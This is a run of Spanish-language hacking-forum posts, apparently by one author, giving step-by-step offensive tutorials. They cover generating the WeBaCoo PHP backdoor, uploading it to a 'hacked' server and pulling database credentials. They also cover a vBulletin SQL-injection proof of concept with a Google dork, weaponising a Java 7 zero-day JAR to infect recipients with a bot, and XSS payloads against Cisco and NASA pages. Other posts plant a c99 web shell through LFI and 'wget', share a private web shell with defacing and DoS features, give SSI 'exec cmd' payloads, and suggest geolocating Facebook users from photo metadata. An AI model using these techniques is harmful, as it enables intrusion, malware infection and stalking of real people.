Código: txt
./webacoo.pl -g -o backdoor.php

2) Crear 'raw-backdoor.php' backdoor des-ofuscado usando la funciona "transito":
Código: txt
./webacoo.pl -g -o raw-backdoor.php -f 4 -r

3) Establecer "terminal" conexión con el host remoto usando la configuración por defecto:
Código: txt
./webacoo.pl -t -u http://127.0.0.1/backdoor.php

4) Establecer "terminal" conexión con el host remoto al configurar algunos argumentos:
Código: txt
./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

5) Establecer "terminal" conexión con el host remoto a través de proxy HTTP:
Código: txt
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

6) Establecer "terminal" conexión con el host remoto a través de HTTP proxy con autenticación básica:
Código: txt
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128

7) Establecer "terminal" conexión con el host remoto a través de Tor y registrar la actividad:
Código: txt
./webacoo.pl -t -u http://example.com/backdoor.php -p tor -l webacoo_log.txt


Ahora bien, teniendo la herramienta instalada y conociendo los comandos, procederemos a crear el backdoor para obtener conexión con el servidor web desde la consola.

Para este caso he obtenido un servidor cualquiera (hacked) donde subiré el backdoor que creare con el siguiente comando:
Código: txt
./webacoo.pl -g -o backdoor.php


El backdoor.php se crea y ubica en la carpeta de los archivos (WeBaCoo), entonces subiremos dicho archivo al servidor (hacked) y procederemos a conectarnos al servidor con el siguiente comando:
Código: txt
./webacoo.pl -t -u http://www.sitio-web.com/backdoor.php


La conexión hacia el servidor es perfecta, por lo que obtendremos la conexión muy rapida.

Comandos Simples:

En este caso colocaremos "load" para ver los comandos con los que manejaremos todo el servidor, las cuales son los siguientes:

1) MySQL-CLI: MySQL Command Line Module:
Código: txt
mysql-cli <IP(:port)> <user> <pass>      (ex. 'mysql-cli 10.0.1.11 admin pAsS')

2) PSQL-CLI: Postgres Command Line Module:
Código: txt
psql-cli <IP(:port)> <db> <user> <pass>  (ex. 'psql-cli 10.0.1.12 testDB root pAsS')

3) Upload: File Upload Module:
Código: txt
upload <local_file> <remote_dir>         (ex. 'upload exploit.c /tmp/')

4) Download: File Download Module:
Código: txt
download <remote_file>                   (ex. 'download config.php')

5) Stealth: Enhance Stealth Module
Código: txt
stealth <webroot_dir>                 (ex. 'stealth /var/www/html')


Estos comandos son fáciles de usar, haré una breve demostración con el comando MySQL-CLI para obtener y conectarme a la db del servidor.

1) Descargamos el archivo de configuración:
Código: txt
download configuration.php 


2) Abrimos el archivo configuration.php copiar el user y password del MySQL, tecleamos el comando:
Código: txt
mysql-cli 127.0.0.1:3306 db_user db_password



3) La tool conectara al MySQL, solo nos queda teclear show databases; para apreciar toda la DB.


De igual forma utilizaremos los demás comandos para subir un local root exploit o descargar cualquier archivo del servidor.

Ahora con esta herramienta ya no es necesario que un servidor web tenga el Netcat o hacer un BackConnection que muchas veces no funciona, para conectarse a un servidor web.

Espero les sirva.

Saludos.
#17
Nueva vulnerabilidad que afecta los sistemas de Vbulletin en la version 4.0.2.

Recien salida del horno:

Código: txt
# Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
# Google Dork: inurl:awards.php intext:"powered by vbulletin"
# Date: 29/08/12
# Exploit Author: Backsl@sh/Dan
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
# Version: 4.0.2+



The vulnerability exists within /request_award.php.

$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,
));

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string

($vbulletin->GPC['award_request_reason']) ."')");

$award_request_uid is used within an insert into statement, unsanitized.


- POC -
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit


Thanks. Have fun.

http://www.bugabuse.net/
#18
Bugs y Exploits / Explotando Java7 0day - Exploit .JAR
Agosto 29, 2012, 09:57:59 PM

Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
Pass: calebbucker

Necesitaremos el Programa Eclipse: 
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("No tienes permitido ver los links. Registrarse o Entrar a mi cuenta");


Ahora, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

Código: txt
<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>


En mi caso el codigo queda de la siguiente manera:

Código: txt
<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>



Esos archivos la subimos en nuestro Host el test.jar, index.html y applet1.class, de preferencia de pago.

Ahora solo queda enviar el link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(


Esta vulnerabilidad también puede ser explotada desde Metasploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

PARCHE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#19
Hacking ShowOff / XSS Cisco System
Agosto 27, 2012, 07:12:54 PM
Un XSS de hace meses en Cisco:



POC:
Código: txt
http://developer.cisco.com/web/axl/wikidocs?p_p_id=1_WAR_wikinavigationportlet_INSTANCE_i9JW&p_p_lifecycle=0&p_p_state=normal&p_p_mode=view&p_p_col_id=column-1&p_p_col_count=1&p_r_p_185834411_nodeId=803208&p_r_p_185834411_title="><script>alert(TioSamCL-Security)</script>


Status: FIXED
#20
Hacking ShowOff / XSS Persistent NASA.GOV
Agosto 23, 2012, 08:54:06 PM
Código: text
1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1                                                                        1
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|              NASA.GOV - Cross Site Scripting Persistent                |
--------------------------------------------------------------------------
# Exploit Title : NASA Curiosity - Cross Site Scripting Persistent
# Date          : 21-08-2012
# Author        : Caleb Bucker (Independent Security Researcher)
# Vendor        : NASA
# Category      : misc
# URL Vendor    : http://www.nasa.gov/
# Tested on     : BackTrack 5 r3 - Mozilla Firefox
# Contact       : [email protected]
# Website       : www.calebbucker.blogspot.com
# Greetings to  : CL-Security All Members And Friend's

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCREENSHOT:

http://img341.imageshack.us/img341/4395/snapshot408.png

http://img837.imageshack.us/img837/7151/snapshot409.png
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

VULNERABILITY LOCATION:

www.nasa.gov/mission_pages/msl/news/msl20120817.html[code]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

CROSS SITE SCRIPTING:

www.nasa.gov/mission_pages/msl/news/msl20120817.html"><script>alert('CalebBucker')</script> %2522%253E%253Cscript%253Ealert%2528%2527CalebBucker%2527%2529%253C%252fscript%253E

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

HOW TO USE:

"><script>alert('XSS")</script> send it through, works on GET nothing else is really special about it.

so double encoded it will look like this:

%2522%253E%253Cscript%253Ealert%2528%2527XSS%2527%2529%253C%252fscript%253E
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Enjoy!

# 1337day.com [2012-08-22]
#21

En esta entrada, mostraré cómo extraer los Metadatos de las Fotografías para saber el lugar exacto de ubicación donde se tomo la Fotografía.

Hay que tener en cuenta que no todas las Fotografías tienen datos GPS. La mayoría de las fotos que existen con estos datos, son tomadas desde teléfonos inteligentes y/o cámaras de ultima generación.

Sin embargo, muchas personas que cuentan con estos teléfonos, no tienen conocimiento sobre la opción GPS, por lo que simplemente no saben que esta encendido al momento de tomar una Fotografía.

También resaltar que este método es utilizado para resolver muchos "crímenes" porque realizando un Análisis Forense de una Fotografía, se puede obtener los datos REALES y EXACTOS del momento, fecha, hora, ubicación, nombre de la cámara, fecha de edición si la imagen ha sido editada y todas las demás opciones puestas en ella, llegando así a obtener un resultado real.

¿Qué son los metadatos?

Metadatos en pocas palabras es decir, los datos acerca de los datos, por ejemplo cuando se toma una fotografía, se obtiene una gran cantidad de datos, como qué tipo de cámara tome la foto, la hora y fecha en que fue tomada etc...

Ahora bien, para realizar este método, usaremos la herramienta EXIFTOOL que esta disponible tanto para Linux como para Windows.

En BackTrack podemos encontrarla en la siguiente dirección:

Aplicaciones - BackTrack - Forensics - Forensics Analysis Tools - Exiftool

Si aun no la tenes, podes descargarla desde el siguiente link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descomprimen el archivo Exiftool en una carpeta preferida, abren la terminal y vamos a la carpeta exiftool.

INSTALACIÓN:


Teniendo todo listo, creamos una carpeta donde ira la imagen que deseamos extraer los metadatos, en este caso yo he creado una carpeta en root con el nombre images, asegurese de conocer bien la ruta.

La imagen que voy a utilizar se llama fotografia.jpg la cual esta en la carpeta images.

La ruta seria: ~/images/fotografia.jpg

Ahora, en la terminal de exiftool tecleamos el siguiente comando:

./exiftool -a ~/images/fotografia.jpg

La cual nos arroja los siguientes datos:


Se puede observar muchos datos, como la fecha y hora que se tomo la imagen y todo lo demas que mencione lineas arriba, ademas de que la foto fue tomada desde un SAMSUNG.

En este caso, queremos saber la ubicacion de donde fue tomada la fotografia, por lo que copiaremos los datos GPS, la cual son los siguientes:


  • GPS Latitude: 42 deg 24' 54.91" N
  • GPS Longitude: 83 deg 25' 21.36" W
  • GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, nos dirigimos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta e introducimos las coordenadas.


  • GPS Position : 42 deg 24' 54.91" N, 83 deg 25' 21.36" W



¿Por qué no funciona? Bueno, en primer lugar tenemos que tener algunas cosas claras, por ejemplo:

Las coordenadas son:


  • 42 deg 24' 54.91" N, 83 deg 25' 21.36" W

Entonces, tenemos que quitar todo el ' " , N W y poner - entre el medio de las coordenadas, por lo que quedaría así:


  • 42 24 54.91 - 83 25 21.36

Ahora, esas coordenadas las introducimos en Google Maps y nos dará la ubicación exacta.



Como podemos apreciar, esta Fotografía fue tomada en  Laurel Park Dr Livonia, MI 48152, EE.UU

Una cosa divertida de hacer esto es tomar fotos desde Facebook y utilizar este método para encontrar las Coordenadas GPS.

Que se diviertan!

Saludos.
#22
Bugs y Exploits / Owasp Xelenium - XSS Scanner
Julio 31, 2012, 09:02:17 PM

Xelenium es una herramienta de pruebas de seguridad que se puede utilizar para identificar las vulnerabilidades de seguridad presentes en la aplicación web.

Xelenium utiliza el código abierto de automatización de pruebas funcionales de herramientas "Selenium", como su motor y ha sido construido usando Java Swing.

Esta versión ayuda al usuario en la identificación de la vulnerabilidad Cross Site Scripting (XSS) y las amenazas presentes en la aplicación web. En la versión posterior, Xelenium se verá reforzada de tal manera que se podrían identificar las principales vulnerabilidades.

Descargamos la herramienta: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como esta programada en Java, en la consola tenemos que colocar el siguiente comando:

Código: text
java -jar Xelenium.jar


Y se abrirá la interfaz gráfica:


La forma en que funciona esta herramienta es muy fácil, solo tenemos que colocar el sitio web que queramos auditar en "Enter URL", presionamos en "Capture Pages"  y esperamos a que la herramienta cargue los módulos del sitio web.

Terminado dicho proceso, presionamos click en "Perfom XSS Scan" por lo que la herramienta inyectara los códigos Javascript para encontrar las vulnerabilidades XSS.


Espero les sirva.

Saludos.
#23

Vega es un escáner de Vulnerabilidades de código abierto para probar la seguridad de aplicaciones web, en la cual puede ayudarle a encontrar y validar las Inyecciones SQL, Cross-Site Scripting (XSS), Shell Injection, Local File Inclusion, Integer Overflow y otras vulnerabilidades.

Está programada en Java y basado en una interfaz gráfica por la cual se puede ejecutar en Linux, OS X y Windows.

Vega incluye un escáner automatizado para pruebas rápidas y también un Proxy para proteger nuestra IP cuando realizamos alguna auditoria web.

Vega fue desarrollado por Subgraph en Montreal.

Actualmente esta herramienta viene incorporada en el BackTrack a partir de la version R1 y R2.

Ubicación:

Aplicaciones - BackTrack - Vulnerability Assessment - Web Application Assessment - Web Vulnerability Scanners - Vega

Abriendo desde la Consola/Terminal


Interfaz Gráfica de la Herramienta:





Simple Test:


Si aun no tenes esta herramienta en tu Sistema Operativo, visita el sitio oficial del proyecto en la cual podrás descargar y leer mas sobre esta maravillosa herramienta.

Sitio Oficial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Demostracion:

Saludos.
#24
Pentesting / Sensitive Buster v1.0 - r00tw0rm Coders
Julio 18, 2012, 11:28:12 PM

El equipo de r00tw0rm acaba de lanzar hoy una nueva herramienta, llamada "Sensitive Buster"  codeada por Th3breachery Angel Injection.

La herramienta encuentra las vulnerabilidades en los servidores web como tambien Paneles de Administración, Archivos y Carpetas confidenciales, Shells e incluso Copias de Seguridad (backup).

La herramienta esta codeada en Python y es de código abierto para que todo el mundo pueda editarlo.

Uso:

* Instalar y Activar Python
* Abrir la consola/terminal
* Teclear ./sensitivebuster.py

Modos:

* -shell
* -backup
* -dir
* -admin
* -files

Ejemplo:

python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -m files


Utilizar la Herramienta con Proxy:

python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -m files -p 127.0.0.1:8080

Descargar Sensitive Buster: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Password : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

VideoTutorial:


Fuente: TheHackerNews - Traduced By Me
#25
Pentesting / PwnieExpress - Pentesting en Nokia N900
Julio 15, 2012, 03:05:17 PM

PwnPhone
Un Nokia N900 basado en la plataforma Pentesting.

PwnieExpress una de la mejor suite de Pentesting para el Nokia N900. Incluye Aircrack, Metasploit, Kismet, GrimWEPa, SET, FastTrack, Ettercap, Nmap y mucho más.

La pantalla es totalmente personalizada para el Pentesting con accesos directos a Macchanger, incorporado en la tarjeta inalámbrica compatible con la inyección de paquetes, el modo monitor y el modo promiscuo también está disponible.

Principal Pantalla del Escritorio:


Código: text
1. Conky - Para ver el uso del sistema y stats
2. Promiscuous_on_off - Script para activar el modo promiscuo de manera intermitente durante wlan0
3. xterm RootShell - el acceso de root shell en el directorio /home/usuario/MyDocs/pwnphone
4. Macchanger - Rolls dirección MAC de la tarjeta inalámbrica wlan0 y los cambios de nombre de host a "DellPC"
5. Nmap - Versión de línea de Comando de Nmap
6. Zenmap - Versión GUI de Nmap
7. InjectionON - Carga los controladores necesarios para la inyección de paquetes inalámbrico
8. InjectionOFF - Descarga los controladores de la inyección de paquetes y vuelve a cargar los controladores normales wifi
9. Airodump-ng - Rápido acceso a la tecnología inalámbrica sniffer, ejecutando: airodump-ng wlan0
10. Kismet - Wireless Sniffer / herramienta de mapeo
11. Wifite - Herramienta de ataque Wirelles automatizado
12. Wifizoo - Herramienta inalámbrica para olfatear las sesiones activas en el wifi
13. Grimwepa - Hherramienta en GUI que se utilizan con la suite aircrack-ng - WEP / WPA cracking
14. Wepbuster - Automáticamente rompe las redes inalámbricas de WEP en el rango (¡cuidado!)
15. El modo promiscuo en el botón de off - Activa el modo promiscuo en wlan0
16. Wireshark - acceso directo del escritorio - analizador de paquetes / sniffer
17. Tshark - La versión CMD línea de Wireshark - Se ejecuta en wlan0
18. Tcpdump - Ejecutar tcpdump en wlan0 (tcpdump-s0-n-i wlan0)
19. Sslstrip - Herramienta utilizada para despojar a los sitios web de SSL y oler las credenciales
20. Scapy - Interfaz Scapy - la manipulación de paquetes interactivos
21. Nikto - Herramienta Web de exploración de vulnerabilidades
22. SET - Kit de herramientas de Ingeniería Social
23. Metasploit - la versión del CMD msf3 (msfconsole)
24. Metasploit-GUI - versión GUI de msf3
25. Fasttrack - Herramienta automatizada pentesting
26. EttercapNG-Curses - Version Curses de EttercapNG
27. EttercapNG-GUI - versión GUI de EttercapNG


Algunas Imagenes de las Herramientas:







Para poder obtener todas estas aplicaciones en nuestro Nokia N900, tenemos que ingresar a la pagina oficial del proyecto No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y comprar dicho archivo, la cual el precio es de $960.00 USD


Pero si ya tenes el Nokia N900 en tus manos, te facilitare las aplicaciones totalmente gratis !! solo tenes que dirigirte a este link para descargar la aplicación:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (430 MB)

Extraes el archivo tar.gz y podrás ver una carpeta con el nombre "pwnimage" luego abres esa carpeta y habrá un archivo de instrucciones sobre "Como Instalar Pwnie Express" sigues todas las instrucciones y   voila!! tendrás tu MÓVIL listo para realizar Pruebas de Penetración!

Acceso SHH:
Username: root
Password: pwnphone
Ruta: /home/user/MyDocs/pwnphone

Espero te guste...

Saludos.
#26

Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI?

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
www.sitio-web.com/index.php?file=


Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar


Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la cual quedaría asi:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:


Otros comandos:

Lista de directorios
<? system ('ls'); ?>

Identificación
<? system ('id'); ?>

Convertir el formato
<? system ('mv file.txt file.php'); ?>

Descargar
<? system ('wget'); ?>


Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

<? system ('wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'); ?>



Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>



Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php


Ahora, en este caso nos dirigimos a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y Voila tenemos nuestra shell!!


No Entendistes?

Observa el VideoTutorial en 1080p HD!


Espero te sirva y lo uses con prudencia.

Saludos.
#27

Hola, esta vez les dejare una herramienta para encontrar Plugins Vulnerables en los sitios WordPress, es útil para tareas de Pruebas de Penetración y/o para la diversión y beneficio.

La versión actual cuenta con 240 Pruebas de Seguridad.

Esta versión se publico el 18 de Junio del 2012.

Descargamos la herramienta desde el siguiente link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descomprimimos, y ejecutamos al herramienta con el siguiente comando:

Código: text
root@TioSam:~# cd Desktop
root@TioSam:~/Desktop# cd WordPress
root@TioSam:~/Desktop/WordPress# ls
README  WP
root@TioSam:~/Desktop/WordPress# ./WP http://www.noticiasdehackers.com


En este caso yo he colocado, el link No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para poner a prueba la herramienta, como se aprecia en la siguiente imagen:


Como podemos apreciar, la herramienta nos arrojo la Version WordPress del sitio web en este caso es 3.3.1 en la cual tambien nos arroja el exploit para dicha versión.

Mas abajo, nos muestra los módulos vulnerables, en la cual nos muestra con sus exploits respectivos.

Si queres ver el funcionamiento de esta herramienta, observa el siguiente vídeo, en la cual podes colocar la resolución en 1080p para que aprecies mejor el vídeo.


Espero le des buen uso y puedas parchear las vulnerabilidades de algun sitio WordPress.

Saludos.
#28
Hola que tal...

Bueno quisiera saber si alguien conoce la forma o un soft para pixelear un video.
Lo que pasa es que he realizado un video y dentro de ello se muestra algunos links e imagenes que quiero que se vean opacas o que simplemente no se vea.

Si alguien conoce o sabe como hacerlo, que responda por favor.

Gracias de antemano  ;)
#29
Bugs y Exploits / I-47 v1.3 Shell Private
Julio 04, 2012, 05:16:39 PM
Hola, esta vez voy a dejarles una Shell totalmente privada, la cual me la envió un amigo de Indian Hackers.

Las compartire con ustedes, esperando que le den buen uso, y no estén divulgando el enlace de este archivo en otros foros.

Características de la Shell:

- Mass Code Injector
- Web Surver Fuzzer
- Mass Mailer + Mail Bomber
- Proxy Installer
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, c, php
- Bind Shell
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Automatic Symlink creation
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Password Protected
- Zone-h Poster
- Included Bypasser
- Attractive Look

Nuevas funciones:

- Included Script Locator
- Included TCP / UDP Scanner
- Included Bruteforcer
- Removed some bugs

Imágenes:








Descargar Shell en Ingles:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descargar Shell en Hindi (India)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Usuario: I-47
Password: I-47

Saludos...
#30

Hola, esta vez vamos a ver algo de móviles... en esta entrada te enseñare como distorsionar tu voz cuando realizas una llamada a cualquier celular del mundo, tu voz puede salir como robot y muchas voces mas... te gustaría hacerlo? bueno empecemos...

CONCEPTO:

Un distorsionador de voz permite recibir la señal por micrófono y sacar la señal por el parlante modificada para que la señal no pueda ser descifrada. Muchos delincuentes, secuestradores, espías y otros tipo de personas usan este método para ocultar su voz y con ello tener la seguridad de que su voz no pueda ser reconocida. Algunas personas usan la distorsión por seguridad y otras personas usan la distorsión para llevar acabo delitos y no poder ser reconocido por los agentes de la seguridad.

Para realizar este método, tenemos que usar los siguientes materiales:

MATERIALES:

Adaptador 2 entradas mini Jack RCA Estéreo:


Adaptador 3 entradas mini Jack RCA mono:


Manos libres Estéreo:


Cable RCA mini Jack:


Teléfono móvil con entrada de audífono:


Portátil con salida de audio:


Teniendo todos los materiales que he mencionado, solo nos faltaría tener los software con la cual realizaremos dicho metodo.

SOFTWARE:

Morphovox Pro:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Funny Voice:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fake Voice:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



NOTA: Estos software necesitan ser crackeados o activados mediante seriales o keygen, solo busquen el crack, keygen o serial para poder activarlo y tener acceso a su uso, aparte de usar este software tienen que configurar el sonido de su maquina para que el uso del distorsionador sea posible y funcione todo correctamente. Los materiales que se necesitan para poder hacer el distorsionador móvil se pueden conseguir todos perfectamente en una tienda Electrónica o Sonido, incluso si quieren conseguirlos mas barato pueden comprarlo en tiendas de chinos todo el material especificado no supera mas de los 5,00 euros que en dólares serian 6,28 dólares (España).

CREACIÓN DEL PROYECTO:

Una ves conseguido todos los materiales y el software indicado y con muchas ganas de trabajar nos ponemos manos a la obra y lo aremos todo ordenadamente para que nuestro proyecto salga correctamente.

1.- Descargamos e instalamos el software de nuestro mayor agrado que anteriormente le indique para mi gusto Morphovox Pro ya que es mas completo y mas Profesional.

2.- Tras la instalación de nuestro software dejamos correctamente activado, el software para que no nos de problema lo hacemos mediante el método que prefiramos ya sea mediante craqueo o mediante activación por serial.

3.- Configuramos correctamente nuestro micrófono y sonido de Windows para que no tengamos problemas a la hora de realizar nuestro proyecto.

4.- Comprobamos que nuestro teléfono móvil tenga una tarjeta SIM con saldo para poder hacer nuestra prueba y con la batería de nuestro teléfono móvil al ser posible llena.

5.- Una ves hecho correctamente los pasos anteriores encendemos nuestro ordenador y preparamos todo el material para realizar el proyecto.

6.- Conectar el macho negro del adaptador mini Jack de 2 entradas en la salida de audio de nuestra maquina.

7.- Conectar el macho negro del manos libres en una entrada del adaptador mini Jack de 2 entradas.

8.- Conectar el macho negro del cable RCA mini Jack a la otra entrada del adaptador mini Jack de 2 entradas.

9.- Conectar macho blanco del cable RCA mini Jack a la entrada de sonido amarilla del adaptador mini Jack de 3 entradas.

10.- Conectar macho rojo del cable RCA mini Jack a la entrada de sonido blanca del adaptador mini Jack de 3 entradas.

11.- La entrada que sobra de video se dejaría libre sin conectar nada.

12.- Conectar macho del adaptador mini Jack de 3 entradas en la entrada de auriculares del teléfono móvil.

13.- Una ves seguido los pasos procederíamos a probar nuestro proyecto para comprobar que todo funciona correctamente pondríamos la voz deseada en el software y una ves hecho esto llamaríamos algún teléfono móvil o fijo que estuviéramos con todo conectado y hablaríamos para comprobar su eficacia y que todo funciona correctamente.

14.- Realizando todo lo anterior y teniendo todo configurado, ya podríamos realizar la llamada a cualquier teléfono móvil y nuestra vos se escuchara como un robot o lo que hayamos elegido en el programa, solo tenemos que hablar por el auricular.

Es todo & espero te diviertas  ;)

Autor: DarkSpain@CL-Security
#31

¿Qué es SSI?

Inyección SSI (Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. Inyección de código SSI explota el fracaso de una aplicación web para desinfectar los datos suministrados por el usuario antes de que se insertan en un server-side interpretada archivo HTML.

Si un atacante envía un Server-Side Include, él puede tener la capacidad de ejecutar comandos del sistema operativo, o incluir el contenido de un archivo restringido la próxima vez que se sirve de la página.

Descripción: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Empecemos.

Paso I - Encontrar un Sitio Vulnerable:

El mejor Dork que he encontrado es inurl:bin/Cklb/ entonces lo escribimos en Google y vamos ir probando...

Paso II - Probando el Sitio Vulnerable:

Cuando usamos la Dork  iremos probando web por web para identificar si el sitio es vulnerable a este tipo de inyección...

¿Como identifico si el sitio es vulnerable?

Ejecutando estos simple comandos:
Código: text
<!--#echo var="DATE_LOCAL" -->
Mostrara la Fecha

<!--#exec cmd="whoami"-->
Mostrara que el usuario se esta ejecutando en el servidor (Windows)

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
Mostrara todos los archivos en el directorio

<!-- #exec cmd="dir" --> (Windows)
Mostrara todos los archivos en el directorio


